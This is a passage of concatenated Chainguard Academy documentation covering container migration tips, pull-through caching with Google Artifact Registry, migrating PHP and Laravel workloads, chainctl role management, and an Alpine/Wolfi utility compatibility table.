mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to. Tips for Migrating to Chainguard Containers Although not fully comprehensive, it can be helpful to keep the following list of tips and strategies in mind when migrating to Chainguard Containers. Use development variants when you need a shell If necessary, install a different shell Use apk search to find the utilities needed by your application Beware of entrypoint differences between Chainguard Containers and their upstream counterparts Be aware that Chainguard Containers typically do not run as root by default If packages you need are missing, install them into a base image, preferably as part of a multi-stage build Each of these tips and strategies are explained in greater detail in our guide on Container Migration Tips. Troubleshooting The move to a distroless workflow can be confusing for both individual developers and larger teams. We recommend taking the following steps when you encounter issues as you begin using Chainguard Containers: Debugging Distroless Container Images: Debugging distroless images can be challenging due to the absence of a shell and package manager. Temporary Rebuild with -dev Tag: Temporarily rebuild your image using the development variant to get a shell and other debugging tools. This is useful for local troubleshooting or in developer clusters. Remember to remove the -dev tag before merging. Ephemeral Debug Containers: In Kubernetes, use kubectl debug to launch an ephemeral container attached to the existing Pod for troubleshooting. Docker Debug: While docker debug is available, it requires a Docker Desktop Pro license. cdebug and kubectl debug: These tools allow you to enter a running container for debugging and can access the target container’s file system. chainctl images diff: This command allows you to compare two container images and identify differences between them. General Troubleshooting Tips: Check the image’s overview page in the Containers Directory for specific usage details. If you encounter issues, use a development image as a starting point. Ensure you’ve replaced apt install or equivalent commands with apk add. If elevated privileges are needed, use USER root before commands that require administrative access, then switch back to a non-root user before finalizing the image build. Always check the image documentation for entrypoint details, as they may vary from other distributions. You can find entrypoint details in the Specifications tab on any image’s entry in the Containers Directory. Troubleshooting resources To help with troubleshooting issues that can occur, Chainguard Academy has a guide on Debugging Distroless Containers. We also have a video on Debugging Distroless Containers with Docker Debug. Lastly, you might also find help in the Chainguard Containers FAQs. Migration Resources Chainguard Academy hosts a number of resources that can be useful when migrating to Chainguard Containers. As mentioned previously, most new users of Chainguard Containers would benefit from following our guide on How to Port a Sample Application to Chainguard Containers. You may also find our Migration Best Practices and Checklist guide to be helpful. In addition to these, Chainguard Academy includes several types of resources that can be useful when migrating to Chainguard Containers: Compatibility Guides — These guides highlight the differences between Chainguard Containers and Alpine third-party images. Migration Guides — These provide guidance migrating workloads based on a specific language or platform to use Chainguard Containers. Getting Started Guides — These resources outline how to work with specific Containers, with some including a sample application used in examples. Chainguard Courses — Chainguard Courses exist to reduce onboarding friction through product-centered education. Language- or Platform-specific resources We currently offer both Migration and Getting Started Guides for these Containers: Image Migration Guide Getting Started Guide Node ✅ (link) ✅ (link) Python ✅ (link) ✅ (link) PHP ✅ (link) ✅ (link) Migration Guides Node PHP Python In addition, we have a few migration guides in the form of videos: Go (video) Java (video) Node (video) Compatibility Guides Alpine Debian Red Hat Ubuntu Getting Started Guides Cilium Go Istio Laravel MariaDB NeMo nginx Node PHP PostgreSQL Python PyTorch Ruby WordPress Courses In addition to the Academy resources listed above, Chainguard offers a number of courses aimed to help teams understand and use Chainguard Containers. Quickstart Chainguard Containers Crash Course: A quick overview of everything you need to know to get started ASAP. Getting Started (Developer-focused) Getting Started With Chainguard Containers: Intro to everything you need to know - from basic setup to security scanning. Foundations of Supply Chain Security: The what, why, and how of keeping your software supply chain secure. Migration Guidance: Your friendly guide to moving to Chainguard Containers without the headaches. Level Up (Next Level Courses) Foundations of Supply Chain Security: The what, why, and how of keeping your software supply chain secure. Images! Images! Images!: Become an image expert - from FIPS to SBOMs and everything in between. Crush Your CVEs: Master vulnerability management and keep your systems secure. Running the Show (Admin Courses) Registry Rockstar: Everything you need to know about managing access, identity, and registry setup. Chainguard’s Superstar Support: Get the most out of Chainguard’s support resources and tools. Further Reading Overview of Chainguard Containers How to Use Chainguard Containers How to transition to secure container images with new migration guides (Blog) Getting Started with Distroless Containers --- ### How to Set Up Pull Through from Chainguard's Registry to Google Artifact Registry URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifact-registry-pull-through/ Last Modified: August 19, 2024 Tags: Product, Chainguard Containers, Registry Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts. In this situation, you can set up a proxy repository to function as a mirror of Chainguard’s registry. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up a remote repository with Google Artifact Registry. It will walk you through how to set up an Artifact Registry Repository you can use as a pull through cache for Chainguard’s public Starter containers or Production containers originating from a private Chainguard repository. Prerequisites In order to complete this tutorial, you will need the following: Docker installed on your local machine. Follow the official installation instructions to set this up. Administrative privileges over a Google Cloud Platform project. This project will also need to have the Artifact Registry API enabled. If you plan to set up an Artifact Registry repository to serve as a pull through cache for Production containers, then you will also need to have privileges to create a pull token from Chainguard. Additionally, you’ll need chainctl installed to create the pull token. If you haven’t already installed this, follow the installation guide. Setting up Google Artifact Registry as a Pull Through for Starter Containers Chainguard’s Starter container images are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Google Artifact Registry from which you can pull Chainguard Starter container images, log in to the Google Cloud Console and choose your project. Once there, navigate to the Artifact Registry section, click on Repositories in the left-hand navigation menu, and click on the Create Repository button near the top of the page. On the Create Repository page, enter the following details for your new remote repository: Name — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name chainguard-pull-through. Format — For the purposes of this guide, this must be set to Docker. Mode — Set this to Remote. Remote repository source — Choose Custom then enter https://cgr.dev/ in the Custom repository field. Following that, choose the Location, Encryption and Cleanup policy options for your repository. This guide’s examples will use the location us-central1, but you can choose the location that best suits your needs. Finally, click the Create button to create the repository. Testing pull through of a Starter container image By default, the Artifact Registry repository requires authentication. Log in with a valid Google Artifact Registry: gcloud auth configure-docker us-central1-docker.pkg.dev Be sure to change us-central1 to reflect the location of your Artifact Registry repository. Also, after running this command you may be prompted to log in to your Google Cloud account. After running the command, you will be able to pull a Starter container through Google Artifact Registry. The following example pulls the go container: docker pull us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/chainguard/go:latest This command first specifies the location of the Artifact Registry repository we just created (us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/). It then follows that with the name of the Starter containers and the remote repository we want to pull it from (chainguard/go:latest). If you run into issues with this command, be sure that it contains the correct Google Artifact Registry URL for your repository, including the location and project ID. Setting up Google Artifact Registry as a Pull Through for Production Containers Chainguard’s Production container images are enterprise-ready container images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up a Google Artifact Registry repository that you can use as a pull through cache for Chainguard Production container images is similar to the one outlined previously for Starter containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived tokens that can be used to pull container images from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Google Artifact Registry. First log in with chainctl: chainctl auth login Then configure a pull token: chainctl auth configure-docker --pull-token This command will prompt you to select an organization. Be sure to select the organization whose Production container images you want to pull through the Artifact Registry repository. This will create a pull token and print a docker login command that can be run in a CI environment to log in with the token. This command includes both --username and --password arguments. Note down the username value, as you will need it shortly. Then run the following command to create an environment variable named $PASSWORD set to the pull token password generated by the previous command: export PASSWORD=<password value copied from previous output> Now that you’ve set up a pull token, you can configure a repository for pulling through Production container images. You can edit the existing repository and all your users will have access to the private images. Alternatively, you could create a new chainguard-private repository exactly as before but with restricted access, though restricting access to repositories in Google Artifact Registry is beyond the scope of this guide. First, you will need to store the pull token password as a Google Secret Manager secret. This is because Google Artifact Registry does not support storing passwords directly in the repository configuration. To do this, first run the following command: gcloud secrets create chainguard-pull-token This command creates an empty secret. Next, you can update the secret with the pull token password using the environment variable you set previously: echo -n $PASSWORD | gcloud secrets versions add chainguard-pull-token --data-file=- If you haven’t already done so, this command will ask if you want to enable the Secret Manager API. Press y and then ENTER to enable the API and allow the command to finish. Alternatively, you can also provide the secret using the Google Cloud Console in the Secret Manager section. To do this, select Create Secret, provide a name for the secret, and enter the pull token password in the Secret value field. You also have the option to choose a replication policy, rotation policy, expiration policy, notification policy and more for the secret. Back in the Google Artifact Registry, click on the repository you want to configure for pulling through Production containers and then click on the Edit button to edit the repository configuration. In the Remote repository source section of the configuration screen, choose Authenticated. Enter the pull token username value in the Username field. In the Password field, select the secret you created in Google Secret Manager. Click the Save button to apply the changes. Testing pull through of a Production container: As with testing pull through of a Starter container, you’ll first need to authenticate to the Artifact Registry: gcloud auth configure-docker us-central1-docker.pkg.dev Be sure to change us-central1 to reflect the location of your Artifact Registry repository. After running the command, you will be able to pull any Production container images that your organization has access to through Google Artifact Registry. For example, the following command will pull the chainguard-base Container if your organization has access to it: docker pull us-central1-docker.pkg.dev/<your-project-id>/chainguard-pull-through/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Chainguard organization’s registry. Debugging Pull Through from Chainguard’s Registry to Google Artifact Registry If you run into issues when trying to pull Containers from Chainguard’s registry to Google Artifact Registry, please ensure the following requirements are met: Ensure that all Containers network requirements are met. When configuring a remote Google Artifact Registry repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the Google Artifact Registry pull token credentials) and try pulling an image from cgr.dev/chainguard/<image name> or cgr.dev/<company domain>/<image name>. It could be that your Google Artifact Registry repository was misconfigured. In this case, create and configure a new Google Artifact Registry repository to test with. Learn More If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by checking out our Containers documentation. If you’d like to learn more about Google Artifact Registry, we encourage you to refer to the official Google Artifact Registry documentation. --- ### Migrating to PHP Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating-php/ Last Modified: April 4, 2024 Tags: Chainguard Containers, Product, Migration Chainguard Containers are built on top of Wolfi, a Linux undistro designed specifically for containers. Our PHP images have a minimal design that ensures a smaller attack surface, which results in smaller images with few to zero CVEs. Nightly builds deliver fresh images whenever updated packages are available, which also helps to reduce the toil of manually patching CVEs in PHP images. This article will assist you in the process of migrating your existing PHP Dockerfiles to leverage the benefits of Chainguard Containers, including a smaller attack surface and a more secure application footprint. PHP Chainguard Containers Chainguard offers multiple PHP images and variants catering to distinct use cases. In addition to the regular PHP image that includes CLI and FPM variants, we offer a dedicated Laravel image designed for Laravel applications. Each variant comes in two flavors: a minimal runtime image (distroless) and a development variant distinguished by the -dev suffix (e.g., latest-dev). In a nutshell, distroless images don’t include a package manager or a shell, being used exclusively as runtimes to keep the environment to a minimum. Development variants, on the other hand, include packages such as apk and composer for building PHP applications. Development variants can be used as-is to provide a more straightforward migration path. Whenever possible, though, we encourage users to combine both images in a multi-stage environment to build a final distroless image that will function strictly as an application runtime. For a deeper exploration of distroless images and their differences from standard base images, refer to the guide on Getting Started with Distroless images. Migrating from non-apk systems When migrating from distributions that are not based on the apk ecosystem, you’ll need to update your Dockerfile accordingly. Our high-level guide on Migrating to Chainguard Containers contains details about distro-based migration and package compatibility when migrating from Debian, Ubuntu, and Red Hat UBI base images. Installing PHP Extensions Wolfi offers several PHP extensions as optional packages you can install with apk. Because PHP extensions are system-level packages, they require apk which is only available in our development image variants. The following extensions are already included within all Chainguard PHP image variants: php-mbstring php-curl php-openssl php-iconv php-mbstring php-mysqlnd php-pdo php-pdo_sqlite php-pdo_mysql php-sodium php-phar In addition to those, the Laravel image includes the following extensions: php-ctype php-dom php-fileinfo php-simplexml You can run a temporary container with the php -m command to see a list of enabled extensions: docker run --rm --entrypoint php cgr.dev/chainguard/php -m To check for extensions available for installation, you can run a temporary container with the dev variant of a given image and use apk to search for packages. For instance, this will log you into a container based on the php:latest-dev image: docker run -it --rm --entrypoint /bin/sh --user root cgr.dev/chainguard/php:latest-dev Make sure to update the package manager cache: apk update If you want to search for PHP 8.2 XML extensions, for example, you can run the following: apk search php*8.2*xml* And this should give you a list of all PHP 8.2 XML extensions available in Wolfi. php-8.2-simplexml-8.2.17-r0 php-8.2-simplexml-config-8.2.17-r0 php-8.2-xml-8.2.17-r0 php-8.2-xml-config-8.2.17-r0 php-8.2-xmlreader-8.2.17-r0 php-8.2-xmlreader-config-8.2.17-r0 php-8.2-xmlwriter-8.2.17-r0 php-8.2-xmlwriter-config-8.2.17-r0 php-simplexml-8.2.11-r1 php-xml-8.2.11-r1 php-xmlreader-8.2.11-r1 php-xmlwriter-8.2.11-r1 For more searching tips, check the Searching for Packages section of our base migration guide. Migrating PHP CLI workloads to use Chainguard Containers Our latest and latest-dev PHP image variants are designed to run CLI applications and scripts that don’t need a web server. As a first step towards migration, you might want to change your base image to the latest-dev variant, since that would be the closest option for a drop-in base image replacement. Once you have your dependencies and steps dialed in, you can optionally migrate to a multi-stage build to create a strict runtime containing only what the application needs to run. The following Dockerfile uses the php:latest-dev image to build the application, which in this case means copying the application files and installing dependencies via composer. A second build stage copies the application to a final distroless image based on php:latest. FROMcgr.dev/chainguard/php:latest-dev AS builderUSERrootCOPY .. /appRUN chown -R php /appUSERphpRUN cd /app && \ composer install --no-progress --no-dev --prefer-distFROMcgr.dev/chainguard/php:latestCOPY --from=builder /app /appENTRYPOINT [ "php", "/app/myscript.php" ]Our PHP Getting Started guide has step-by-step instructions on how to build and run a PHP CLI application with Chainguard Containers. Migrating PHP Web applications to use Chainguard Containers For PHP web applications that serve content through a web server, you should use the latest-fpm and latest-fpm-dev variants of our PHP image. Combine it with our Nginx image and an optional database for a traditional LEMP setup. The overall migration process is essentially the same as described in the previous section, with the difference that you won’t set up application entry points, since these images run as services. Your Dockerfile may require additional steps to set up front-end dependencies, initialize databases, and perform any additional tasks needed for the application to run through a web server. You can use Docker Compose to create a LEMP environment and test your setup locally. The following docker-compose.yaml file creates a local environment to serve a PHP web application using our PHP-FPM, Nginx, and MariaDB images: version:"3.7"services:app:image:cgr.dev/chainguard/php:latest-fpm-devrestart:unless-stoppedworking_dir:/appvolumes:- ./app:/appnetworks:- wolfinginx:image:cgr.dev/chainguard/nginxrestart:unless-stoppedports:- 8000:8080volumes:- ./app:/app- ./nginx.conf:/etc/nginx/nginx.confnetworks:- wolfimariadb:image:cgr.dev/chainguard/mariadbrestart:unless-stoppedenvironment:MARIADB_ALLOW_EMPTY_ROOT_PASSWORD:1MARIADB_USER:userMARIADB_PASSWORD:passwordMARIADB_DATABASE:php-testports:- 3306:3306networks:- wolfinetworks:wolfi:driver:bridgeNotice that the environment creates a few shared volumes to share the application files and also the nginx.conf file with the specific web server configuration. You’ll need that to tell Nginx to redirect .php requests to the php-fpm service. An example nginx.conf file to handle PHP requests with default settings: pid /var/run/nginx.pid;events {worker_connections 1024;}http {server {listen 8080;index index.php index.html;root /app/public;location ~ \.php$ {try_files $uri =404;fastcgi_split_path_info ^(.+\.php)(/.+)$;fastcgi_pass app:9000;fastcgi_index index.php;include fastcgi_params;fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_param PATH_INFO $fastcgi_path_info;}location / {try_files $uri $uri/ /index.php?$query_string;gzip_static on;}}}Migrating Laravel Applications to use Chainguard Containers Chainguard has a dedicated Laravel image designed for applications built on top of the Laravel PHP Framework. This image is based on the php:latest-fpm variant, with additional extensions required by Laravel. Migration should follow the same steps described in previous sections, with the laravel:latest-dev variant as builder and laravel:latest as the distroless variant of this image. In addition to including extensions required by Laravel by default, the image includes a laravel system user that facilitates running composer and artisan commands from a host environment, which enables users to create and develop Laravel applications with the -dev variant of this image. Check the section on Developing Laravel Applications for more information on how to use the development variant of the Laravel image for development environments. Using Development Containers Our PHP development images are minimal yet versatile images that include apk and composer. You can use these images to create and develop PHP applications on a containerized development environment. Development images can be identified by the -dev suffix (e.g: php:latest-dev). You can use them to execute Composer commands from a Dockerfile or directly from the command line with docker run. This allows users to run Composer without having to install PHP on their host system. Running Composer To be able to write to your host’s filesystem through a shared volume, you’ll need to use the root container user when installing dependencies with Composer using the latest-dev or latest-fpm-dev image variants. Example 1: Installing Dependencies docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ install Example 2: Requiring a new dependency docker run --rm -v ${PWD}:/app --entrypoint composer --user root \ cgr.dev/chainguard/php:latest-dev \ require minicli/minicli You’ll need to fix file permissions once installation is finished: sudo chown -R ${USER}:${USER} . Running the Built-in Web Server You can use the built-in PHP web server to preview web applications using a docker run command with a port redirect. The following command will run the php:latest-dev image variant with the built-in server (php -S) on port 8000, redirecting all requests to the same port on the host machine, and using the current folder as document root: docker run -p 8000:8000 --rm -it -v ${PWD}:/work \ cgr.dev/chainguard/php:latest-dev \ -S 0.0.0.0:8000 -t /work The preview should be live at localhost:8000. Developing Laravel Applications The laravel:latest-dev image has a system user with uid 1000 that can be used for development. This facilitates handling file permissions when working with shared volumes in a development environment. Creating a New Laravel Project The following command will create a new Laravel project called demo-laravel in the current folder. docker run --rm -v ${PWD}:/app --entrypoint composer --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ create-project laravel/laravel demo-laravel --working-dir=/app Running Artisan Commands To run Artisan commands, you’ll need to create a volume to share your Laravel application within the container and set the image entrypoint to /app/artisan. The following example runs the artisan migrate command from the application folder: docker run --rm -v ${PWD}:/app --entrypoint /app/artisan --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ migrate Running the Artisan Web Server To quickly preview your Laravel application, you can use Artisan’s built-in web server. The following command runs the built-in Artisan web server from the application folder: docker run -p 8000:8000 --rm -it -v ${PWD}:/app --entrypoint /app/artisan --user laravel \ cgr.dev/chainguard/laravel:latest-dev \ serve --host=0.0.0.0 The preview should be live at localhost:8000. Additional Resources Our PHP image documentation covers details about all PHP image variants, including the list of available tags for both development and production images. For another example of a LEMP setup using MariaDB, check our guide on Getting Started with the MariaDB Chainguard Container. The Debugging Distroless guide contains important information for debugging issues with distroless images. You can also refer to the Verifying Containers resource for details around provenance, SBOMs, and image signatures. --- ### Overview of Roles and Role-bindings in Chainguard URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/roles-role-bindings/roles-role-bindings/ Last Modified: April 3, 2024 Tags: chainctl, Product, Overview In the context of Chainguard, an identity represents an individual user within an organization. Chainguard’s IAM model allows administrators to assign identities to specialized roles which define the level of access that an identity has to the organization’s resources. You assign a role by creating a role-binding, which is what ties an identity to a given role. This guide serves as an overview of what roles and role-bindings are within the context of Chainguard. It also outlines how you can manage roles and role-bindings with chainctl. Prerequisites This guide includes several examples of how you can manage roles and role-bindings with chainctl, the Chainguard command-line tool. To set up chainctl, follow our guide on how to install chainctl if you haven’t done so already. Roles There are a number of built-in roles in Chainguard’s IAM model that customers can assign to identities within their organization. owner is the role with the most privileges. An owner can create, delete, view (list), and modify (update) organizations, account associations, role-bindings, organization invitations, custom roles, role-bindings, and subscriptions. editor is the role with read access and limited creation and modification access. An editor can create, delete, and view images, clusters, role-bindings, and subscriptions. Additionally, an editor can modify role-bindings and subscriptions. As opposed to the owner role, an editor can view images, policies, records, organizations, organization invites, roles, and account associations but cannot create or make changes to these resources. viewer is a role that generally only has read-only access. That is, a viewer can list images, policies, organizations (and organization invites), clusters, records, roles and role-bindings, subscriptions, and account associations. The remaining roles are for more specialized functions. For example, registry.pull, registry.push, and registry.pull_token_creator relate to administering a registry of Chainguard products. You can run chainctl iam roles list to retrieve a list of all the roles available to your organization and review each of their specific capabilities. This command will list all the built-in roles as well as any custom roles created for your organization. The next section outlines how to create and manage such custom roles. Managing custom roles You can use chainctl to create custom roles for teams or individuals in your organization, like in the following example. chainctl iam roles create my-role After running this command, an interactive prompt will appear asking you to select what capabilities the new role should have and the organization under which the role should be created. You can avoid using the interactive prompt by including the --parent and --capabilities options in this command. chainctl iam roles create new-role --parent=example-org --capabilities=roles.list This example creates a new role named new-role under an organization named example-org. The new role will only have the ability to list roles in the organization. You can also use chainctl to delete custom roles. chainctl iam roles delete new-role Note that you cannot delete any of the built-in roles. Attempting to do so will result in an error. Managing Role-bindings You can assign a role — and all of its capabilities — to a given user by creating a role-binding and tying it to that user’s identity. You can run a command like the following example to create a role-binding. chainctl iam role-bindings create This will start an interactive prompt where you can enter the appropriate details for this new role-binding. Specifically, you’ll be prompted to specify the identity to bind, the role you want the identity bound to, and the organization that the role-binding should belong to. To avoid using the interactive prompt, you can add these details to the command by including the --identity, --role, and --parent options. chainctl iam role-bindings create --identity=example-id --role=viewer --parent=example-org This example creates a role-binding for the identity example-id with the built-in viewer role in an organization named example-org. Note that in order to use the --identity option like this, you will need to know the given identity’s UIDP. You can find a list of all your identities’ UIDPs by running chainctl iam identities ls. The identities’ UIDPs will appear in the resulting ID column. Learn more You can create a Chainguard identity for an automation system (such as Buildkite or GitHub Actions) to assume. This process involves choosing a role for the assumable identity and then creating a role-binding for it. Check out our overview of assumable identities — as well as our collection of assumable identity examples — to learn more. If you’d like to learn more about Chainguard’s IAM model and structures, we encourage you to read our Overview of the Chainguard IAM Model. --- ### Alpine Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/alpine-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Alpine base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Alpine distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Alpine. Additionally, be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alipne binaries into a Wolfi-based container image. You can use the apk search command in Wolfi and Alpine to find out which package includes a tool. Utility Wolfi busybox Alpine busybox Wolfi coreutils Alpine coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ ✅ addgroup ✅ ✅ adduser ✅ ✅ adjtimex ✅ ✅ arch ✅ ✅ arp ✅ arping ✅ ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ ✅ bc ✅ ✅ beep ✅ ✅ blkdiscard ✅ blkid ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ ✅ coreutils ✅ ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ crond ✅ crontab ✅ cryptpw ✅ ✅ csplit ✅ ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ ✅ deluser ✅ ✅ depmod ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ eject ✅ env ✅ ✅ ✅ ether-wake ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fbset ✅ fbsplash ✅ fdflush ✅ fdisk ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ ✅ flock ✅ ✅ fmt ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ fsck ✅ fstrim ✅ fsync ✅ ✅ fuser ✅ ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ hwclock ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifenslave ✅ ifup ✅ init ✅ inotifyd ✅ ✅ insmod ✅ install ✅ ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ✅ ip ✅ ipaddr ✅ ipcalc ✅ ipcrm ✅ ✅ ipcs ✅ ✅ iplink ✅ ipneigh ✅ iproute ✅ iprule ✅ iptunnel ✅ join ✅ ✅ kbd_mode ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ ✅ lsmod ✅ lsof ✅ ✅ lsusb ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ ✅ makemime ✅ md5sum ✅ ✅ ✅ ✅ mdev ✅ mesg ✅ microcom ✅ ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mkfifo ✅ ✅ ✅ ✅ mkfs.vfat ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ ✅ mpstat ✅ ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nanddump ✅ nandwrite ✅ nbd-client ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ ✅ nohup ✅ ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ ntpd ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ ✅ paste ✅ ✅ ✅ ✅ pathchk ✅ ✅ pgrep ✅ ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ ✅ pivot_root ✅ ✅ pkill ✅ ✅ pmap ✅ ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pscan ✅ pstree ✅ ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ ✅ raidautorun ✅ rdate ✅ rdev ✅ ✅ readahead ✅ ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ reformime ✅ remove-shell ✅ ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ ✅ rev ✅ ✅ rfkill ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ route ✅ run-parts ✅ ✅ runcon ✅ ✅ sed ✅ ✅ sendmail ✅ seq ✅ ✅ ✅ ✅ setconsole ✅ setfont ✅ setkeycodes ✅ setlogcons ✅ setpriv ✅ ✅ setserial ✅ ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ ✅ sha512sum ✅ ✅ ✅ showkey ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ slattach ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ ✅ sum ✅ ✅ ✅ ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ tee ✅ ✅ ✅ ✅ test ✅ ✅ ✅ ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ ✅ tunctl ✅ ✅ udhcpc ✅ udhcpc6 ✅ umount ✅ uname ✅ ✅ ✅ ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock ✅ ✅ volname ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ whois ✅ xargs ✅ ✅ xxd ✅ ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ zcip ✅ --- ### How to Set Up Pull Through from Chainguard's Registry to Artifactory URL: https://edu.chainguard.dev/chainguard/chainguard-registry/pull-through-guides/artifactory/artifactory-images-pull-through/ Last Modified: September 4, 2024 Tags: Product, Chainguard Containers Organizations can use Chainguard Containers along with third-party software repositories in order to integrate with current workflows as the single source of truth for software artifacts. In this situation, you can set up a remote repository to function as a mirror of Chainguard’s registry — either the public registry or a private one 